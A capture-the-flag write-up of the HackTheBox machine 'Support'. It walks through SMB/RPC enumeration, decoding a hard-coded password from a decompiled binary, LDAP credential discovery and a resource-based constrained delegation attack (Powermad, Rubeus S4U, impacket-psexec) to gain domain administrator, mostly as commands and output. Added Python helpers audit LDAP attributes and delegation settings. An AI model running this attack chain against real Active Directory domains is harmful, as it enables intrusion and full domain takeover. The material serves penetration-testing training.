Support from HackTheBox


by Johann Van Niekerk


Nmap Scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-08 11:08:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Support is a HackTheBox machine that is rated easy.

HackTheBox rates Support as easy, but the community considers it medium difficulty. While it presents some challenges, it is a valuable learning experience: working through this machine taught me how to enumerate domain controllers, which helped me excel in later challenges and exams.

Initial Access - Decoded Credentials

Initial enumeration begins with the ports most likely to leak information. The open ports already tell us the target is a domain controller: 53 (DNS), 88 (Kerberos), 389 (LDAP) and 3268 (Global Catalog LDAP) together are characteristic of a DC, and the Nmap service line reports the domain support.htb and the host name DC.

First steps begin with SMB. We try various authentication methods, and our first attempt at anonymous login reveals a readable share, "support-tools":

cme smb 10.10.11.174 -u 'a' -p '' --shares

Using smbclient we can connect to the share without credentials (press Enter at the password prompt):

smbclient //10.10.11.174/support-tools
# password prompt: leave empty (no password)

Through this SMB connection we pull an interesting file, "UserInfo.exe.zip", to inspect more closely. Unzipping it yields a single executable, and we check whether it leaks anything useful with the "strings" binary.

# Unzip
unzip UserInfo.exe.zip

# Strings
strings UserInfo.exe

Unfortunately this doesn't uncover any additional information; a closer look will need tooling on a Windows VM. For now we proceed with the remaining ports and see what further information we can pull.

Next we tackle port 135 (MSRPC) and check whether anonymous login is permitted and whether we can query the domain controller through it.

rpcclient -U"" 10.10.11.174

With the connection succeeding, we send some queries to find any information we can get. lsaenumsid lists the SIDs known to the LSA, and lookupsids resolves a SID to a name; by incrementing the final component of the SID (the RID) by common values we build a rough picture of the accounts in the domain.

Usually administrator accounts and groups sit in the 500 range of RIDs, while ordinary users are typically in the 1000 range.

# List SIDs known to the LSA
lsaenumsid
# Resolve a well-known SID (BUILTIN\Administrators)
lookupsids S-1-5-32-544

Our original query returned a valid SID for the domain but without the trailing user identifier (the RID), so this part took some guesswork:

# Domain SID
lookupsids S-1-5-21-1677581083-3380853377-188903654

# Enumerate users
lookupsids S-1-5-21-1677581083-3380853377-188903654-500
lookupsids S-1-5-21-1677581083-3380853377-188903654-1000
lookupsids S-1-5-21-1677581083-3380853377-188903654-1001
...

From this we discover some usernames for our collection; they may or may not prove useful.

# Users Found
S-1-5-21-1677581083-3380853377-188903654-1106 SUPPORT\smith.rosario (1)
S-1-5-21-1677581083-3380853377-188903654-1107 SUPPORT\hernandez.stanley (1)
S-1-5-21-1677581083-3380853377-188903654-1108 SUPPORT\wilson.shelby (1)
S-1-5-21-1677581083-3380853377-188903654-1109 SUPPORT\anderson.damian (1)
S-1-5-21-1677581083-3380853377-188903654-1110 SUPPORT\thomas.raphael (1)
S-1-5-21-1677581083-3380853377-188903654-1111 SUPPORT\levine.leopoldo (1)
S-1-5-21-1677581083-3380853377-188903654-1112 SUPPORT\raven.clifton (1)
S-1-5-21-1677581083-3380853377-188903654-1113 SUPPORT\bardot.mary (1)
S-1-5-21-1677581083-3380853377-188903654-1114 SUPPORT\cromwell.gerard (1)
S-1-5-21-1677581083-3380853377-188903654-1115 SUPPORT\monroe.david (1)
S-1-5-21-1677581083-3380853377-188903654-1116 SUPPORT\west.laura (1)
S-1-5-21-1677581083-3380853377-188903654-1117 SUPPORT\langley.lucy (1)
S-1-5-21-1677581083-3380853377-188903654-1118 SUPPORT\daughtler.mabel (1)
S-1-5-21-1677581083-3380853377-188903654-1119 SUPPORT\stoll.rachelle (1)
S-1-5-21-1677581083-3380853377-188903654-1120 SUPPORT\ford.victoria (1)
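The SID arithmetic used above, as an added Python example (mine, not part of the original write-up): a small parser for rpcclient's lookupsids output that splits each SID into its domain part and RID, maps the numeric type code rpcclient prints in parentheses to a name, and keeps only the lines that resolved to real user accounts. The sample lines are constructed from two results above, the BUILTIN alias, and one unused RID; the function names are my own.

```python
import re

# SID_NAME_USE values that rpcclient prints in parentheses after each name
SID_TYPES = {1: "user", 2: "group", 3: "domain", 4: "alias",
             5: "well-known group", 6: "deleted", 7: "invalid",
             8: "unknown", 9: "computer"}

# "<SID> <DOMAIN>\<name> (<type>)", the shape of one lookupsids result line
LINE_RE = re.compile(
    r"^(?P<sid>S-1-(?:\d+-)+\d+)\s+(?P<account>\S+)\s+\((?P<type>\d+)\)$")


def split_sid(sid):
    """Split a SID into its issuing part and the trailing RID."""
    base, _, rid = sid.rpartition("-")
    return base, int(rid)


def rid_class(rid):
    """RIDs below 1000 are reserved for built-in accounts and groups
    (500 = Administrator, 512 = Domain Admins); created objects start at 1000."""
    return "well-known" if rid < 1000 else "created"


def parse_line(line):
    """Parse one lookupsids line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    base, rid = split_sid(m["sid"])
    domain, _, name = m["account"].partition("\\")
    return {"sid": m["sid"], "base": base, "rid": rid, "domain": domain,
            "name": name, "type": SID_TYPES.get(int(m["type"]), "unknown"),
            "rid_class": rid_class(rid)}


def resolved_users(lines):
    """Return the account names that resolved to real user objects,
    dropping aliases/groups and the *unknown* lines printed for unused RIDs."""
    users = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["type"] == "user" and rec["name"] != "*unknown*":
            users.append(rec["name"])
    return users


# Constructed sample: the BUILTIN alias, one RID that maps to nothing,
# and two of the results shown in the write-up
SAMPLE = r"""S-1-5-32-544 BUILTIN\Administrators (4)
S-1-5-21-1677581083-3380853377-188903654-1001 *unknown*\*unknown* (8)
S-1-5-21-1677581083-3380853377-188903654-1106 SUPPORT\smith.rosario (1)
S-1-5-21-1677581083-3380853377-188903654-1107 SUPPORT\hernandez.stanley (1)""".splitlines()

if __name__ == "__main__":
    for line in SAMPLE:
        print(parse_line(line))
    print("users:", resolved_users(SAMPLE))
```

Feeding the full lookupsids output through resolved_users gives a clean username list, and the rid_class field makes it obvious which hits are built-in principals rather than accounts someone created.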

After collecting all the usernames and probing the remaining ports, we move "UserInfo.exe" over to a Windows machine and decompile it with the following tool.

ILSpy

Opening UserInfo.exe in ILSpy (alongside Visual Studio), we discover interesting information within UserInfo.Services: a key value "armando", an encoded password, and the code that decodes it.

We convert that code to Python; running the following prints the decoded password for us.

#!/usr/bin/python3
import base64

# Values recovered from the decompiled binary (truncated here)
enc_pass = "0Nv32PT.............truncated............193E"
key = b"a....truncated....o"

# The binary base64-decodes the blob, then XORs each byte with the
# corresponding key byte (cycled) and the constant 223
array = base64.b64decode(enc_pass)
array2 = []

for i in range(len(array)):
    array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))

print(''.join(array2))

# Decoded Password
nvEf................truncated...............1%lmz
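To make the weakness of that routine explicit, here is an added Python example (mine, not the write-up's code and not the binary's) that implements the same scheme in both directions. It shows that the key and the constant 223 collapse into one fixed mask, so the "encryption" is a symmetric XOR and anyone holding the binary (or one plaintext/ciphertext pair) recovers the secret. The key "armando" is the value named in the decompiled code above; the plaintext is a constructed sample, not the machine's real password.

```python
import base64

XOR_CONSTANT = 223  # fixed byte the decompiled routine XORs in with the key


def keystream(key, length):
    """Effective per-byte mask: key byte (cycled) XOR the constant.
    Because both parts are hard-coded, the mask is identical on every run."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(key[i % len(key)] ^ XOR_CONSTANT for i in range(length))


def deobfuscate(enc_b64, key):
    """What the binary does: base64-decode, then XOR with the mask."""
    data = base64.b64decode(enc_b64)
    return bytes(b ^ k for b, k in zip(data, keystream(key, len(data)))).decode()


def obfuscate(plaintext, key):
    """The inverse; identical up to the base64 step, since XOR undoes itself."""
    data = plaintext.encode()
    masked = bytes(b ^ k for b, k in zip(data, keystream(key, len(data))))
    return base64.b64encode(masked).decode()


def mask_from_known_pair(enc_b64, plaintext):
    """Given one (ciphertext, plaintext) pair the whole mask falls out,
    which is why a fixed-key XOR provides no confidentiality."""
    data = base64.b64decode(enc_b64)
    return bytes(c ^ p for c, p in zip(data, plaintext.encode()))


KEY = b"armando"                       # key named in the decompiled code
SAMPLE_PASSWORD = "Constructed-Pa55!"  # constructed, not the real password

if __name__ == "__main__":
    blob = obfuscate(SAMPLE_PASSWORD, KEY)
    print("blob:   ", blob)
    print("decoded:", deobfuscate(blob, KEY))
    print("mask:   ", mask_from_known_pair(blob, SAMPLE_PASSWORD).hex())
```

The lesson for anyone shipping a client binary is the same regardless of the key length: a secret the program must be able to decode on its own is a secret the program's user can decode too, so credentials belong in a per-user or per-host credential store, not in the assembly.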

Looking further into the executable's functions, we also see a user "ldap" under the LdapQuery class. This hints at our next enumeration step.

Using LDAPSEARCH

With the decoded password and an indication of the username (ldap), we can query LDAP:

ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK1.................truncated.....................PWO1%lmz' -b "CN=Users,DC=support,DC=htb"

From this we uncover leftover information in a user attribute that looks like a password for another user, support:

support:I................truncated...........ful
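The leftover password above sits in a free-text LDAP attribute, which is something a defender can audit for on a schedule. As an added Python example (mine, not the write-up's), here is an LDIF reader for ldapsearch output that unfolds continuation lines, decodes base64 ("::") values, and flags description/info/comment values that look like credentials. The heuristic (a keyword such as "pass", or a token of eight or more characters mixing upper case, lower case and digits) is an assumption of mine and will produce false positives; the sample LDIF is constructed and contains no real password.

```python
import base64
import re

# Free-text attributes where operators tend to leave notes
WATCHED = ("info", "description", "comment")
SECRET_HINT = re.compile(r"(?i)pass|pwd|cred|secret")
TOKEN = re.compile(r"[A-Za-z0-9!@#$%^&*._-]{8,}")


def unfold(text):
    """Join LDIF continuation lines (those starting with a single space)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return a list of entries, each a dict attr -> [values] (attrs lower-cased)."""
    entries, cur = [], {}
    for line in unfold(text):
        if not line.strip():
            if cur:
                entries.append(cur)
            cur = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):  # "attr:: <base64>"
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest.strip()
        cur.setdefault(attr.lower(), []).append(value)
    if cur:
        entries.append(cur)
    return entries


def looks_like_credential(value):
    """Heuristic only: a keyword hit, or a mixed-case alphanumeric token of 8+ chars."""
    if SECRET_HINT.search(value):
        return True
    return any(re.search(r"[A-Z]", t) and re.search(r"[a-z]", t) and re.search(r"\d", t)
               for t in TOKEN.findall(value))


def findings(text):
    """(dn, attribute, value) for every watched attribute that looks like a secret."""
    hits = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", ["?"])[0]
        for attr in WATCHED:
            for value in entry.get(attr, []):
                if looks_like_credential(value):
                    hits.append((dn, attr, value))
    return hits


# Constructed LDIF modelled on ldapsearch output; the info value is a dummy
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=support,DC=htb
sAMAccountName: support
description: Shared helpdesk account
info: Xy7-ConstructedSample-42

dn: CN=smith.rosario,CN=Users,DC=support,DC=htb
sAMAccountName: smith.rosario
description:: SGVscCBkZXNrIHN0YWZm
"""

if __name__ == "__main__":
    for dn, attr, value in findings(SAMPLE_LDIF):
        print(f"{dn}: {attr} = {value!r}")
```

Pipe the output of an authenticated ldapsearch over CN=Users into findings() and every hit is a field that should be cleared and a password that should be rotated; the same check applies to ldapdomaindump's output, which carries the same attributes.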

We check our information with CME and can see that the login is successful.

Using LDAPDOMAINDUMP

Similarly, we could use ldapdomaindump to run the same remote domain queries and save the results locally for BloodHound. This produces the same information as before, including the comment that holds the credentials.

ldapdomaindump support.htb -u 'support\ldap' -p 'nvE...............truncated.............%lmz' --no-json --no-grep

Initial Access

After testing our credentials with CME, we can connect over WinRM (port 5985) using the tool "evil-winrm":

evil-winrm -u 'support' -p 'I...........truncated...............ful' -i 10.10.11.174

Using bloodhound-python

Gathering information for BloodHound:

bloodhound-python -u ldap -d support.htb -p 'nvE...........truncated...............O1%lmz' --dns-tcp -ns 10.10.11.174 -c all --zip

Privilege Escalation - Computer Object Takeover/Impersonate

Using BloodHound and checking all the information available, we discover that the Support user has GenericAll privileges on the DC.

This misconfiguration allows our user to perform a Computer Object Takeover by writing the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (resource-based constrained delegation).

Found Computer Object Takeover

First we download a script that lets us create a new computer object. The DC will later be configured to trust this object for delegation.

# On the attacking machine: download and host the script
wget https://github.com/Kevin-Robertson/Powermad/raw/master/Powermad.ps1

# On the victim: fetch it from our web server (10.10.14.34)
certutil -f -urlcache http://10.10.14.34/Powermad.ps1 powermad.ps1

We transfer the script over and execute the following:

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Checking that the computer object was created and noting its SID using "PowerView.ps1":

# Transfer PowerView.ps1 over
certutil -f -urlcache http://10.10.14.34/PowerView.ps1 powerview.ps1

# Run
Get-DomainComputer fake01

Taking note of the SID we created:

S-1-5-21-1677581083-3380853377-188903654-5102

Next we create a raw security descriptor whose single ACE grants full rights to the FAKE01 computer principal:

# Adjust SID to the one we received for FAKE01
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5102)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Targeting the DC computer object by name, we read the attribute, set it to our descriptor, and read it back to confirm:

Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
Get-DomainComputer dc| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'
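The SDDL string handed to RawSecurityDescriptor above is exactly what a defender sees when they read msDS-AllowedToActOnBehalfOfOtherIdentity back from a computer object. As an added Python example (mine, not the write-up's), here is a parser that decodes such a string into its owner, ACE type, rights and trustee, plus an audit helper that reports a finding whenever the attribute is set on a computer and names a trustee outside an allow-list. The SDDL rights abbreviations and trustee aliases are the standard ones; the audit function and allow-list are my own design.

```python
import re
from dataclasses import dataclass

# Standard SDDL rights abbreviations (Active Directory object rights + generic)
RIGHTS = {
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN",
    "SW": "SELF_WRITE", "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY",
    "DT": "DELETE_TREE", "LO": "LIST_OBJECT", "CR": "CONTROL_ACCESS",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE",
}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
             "OA": "OBJECT_ACCESS_ALLOWED", "OD": "OBJECT_ACCESS_DENIED"}
# A few well-known SDDL trustee aliases
ALIASES = {"BA": "BUILTIN\\Administrators", "SY": "NT AUTHORITY\\SYSTEM",
           "DA": "Domain Admins", "WD": "Everyone"}

SDDL_RE = re.compile(
    r"^O:(?P<owner>[A-Z]{2}|S-[\d-]+)(?:G:(?P<group>[A-Z]{2}|S-[\d-]+))?"
    r"D:(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))*)$")


@dataclass
class Ace:
    ace_type: str
    rights: list
    trustee: str


def parse_sddl(sddl):
    """Return (owner, [Ace, ...]) for an SDDL string carrying a DACL."""
    m = SDDL_RE.match(sddl)
    if not m:
        raise ValueError(f"unrecognised SDDL: {sddl!r}")
    owner = ALIASES.get(m["owner"], m["owner"])
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m["aces"]):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: {body!r}")
        ace_type, _flags, rights, _obj_guid, _inherit_guid, trustee = fields
        # rights are a run of two-letter codes, e.g. CCDCLC... -> 13 names
        names = [RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                 for i in range(0, len(rights), 2)]
        aces.append(Ace(ACE_TYPES.get(ace_type, ace_type), names,
                        ALIASES.get(trustee, trustee)))
    return owner, aces


def delegation_trustees(sddl):
    """Principals the descriptor allows to act on behalf of other identities."""
    _, aces = parse_sddl(sddl)
    return [a.trustee for a in aces if a.ace_type == "ACCESS_ALLOWED"]


def audit_rbcd(computer, sddl, allowed=()):
    """Findings for one computer's msDS-AllowedToActOnBehalfOfOtherIdentity value.
    None/empty means delegation is not configured; any trustee outside
    `allowed` is reported, since it can impersonate users to this host."""
    if not sddl:
        return []
    return [f"{computer}: RBCD lets {t} act on behalf of other identities"
            for t in delegation_trustees(sddl) if t not in allowed]


# The descriptor from the write-up, with the FAKE01 SID as trustee
EXAMPLE_SDDL = ("O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
                "S-1-5-21-1677581083-3380853377-188903654-5102)")

if __name__ == "__main__":
    owner, aces = parse_sddl(EXAMPLE_SDDL)
    print("owner:", owner)
    for ace in aces:
        print(ace.ace_type, ace.trustee, ", ".join(ace.rights))
    for finding in audit_rbcd("DC", EXAMPLE_SDDL):
        print(finding)
```

On a domain controller this attribute should normally be empty, so the simplest detection is to alert on any non-empty value (or on the directory change event that writes it); the allow-list exists for member servers where delegation from a known front-end is intended.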

Next we use Rubeus to derive the RC4 hash (the NT hash) of the FAKE01 account password.

Rubeus

We transfer Rubeus over and run it on the victim machine:

./rubeus.exe hash /password:123456 /user:fake01 /domain:support.htb

Rubeus returns the RC4 hash:

rc4:32ED87BDB5FDC5E9CBA88547376818D4

Using this hash, we request a Kerberos ticket (S4U) as our computer object, impersonating the user "administrator" for the cifs/dc.support.htb service:

./rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

Next we convert the base64 blob and ticket to a CCACHE file, which the impacket tools on Linux pick up through the KRB5CCNAME environment variable.

We save the content as administrator.ccache and export it as an environment variable:

export KRB5CCNAME=administrator.ccache

Then we use impacket-psexec with Kerberos authentication to connect to the target as administrator:

impacket-psexec support.htb/administrator@dc.support.htb -no-pass -k

(Alternative) Impacket-getST

Alternatively we can use the impacket tool "impacket-getST" to perform the same request as Rubeus and save the resulting ticket directly into a CCACHE file:

impacket-getST support.htb/fake01 -dc-ip dc.support.htb -impersonate administrator -spn www/dc.support.htb

We save the ticket as administrator.ccache, export it as before, and connect with impacket-psexec as administrator:

export KRB5CCNAME=administrator.ccache
impacket-psexec support.htb/administrator@dc.support.htb -no-pass -k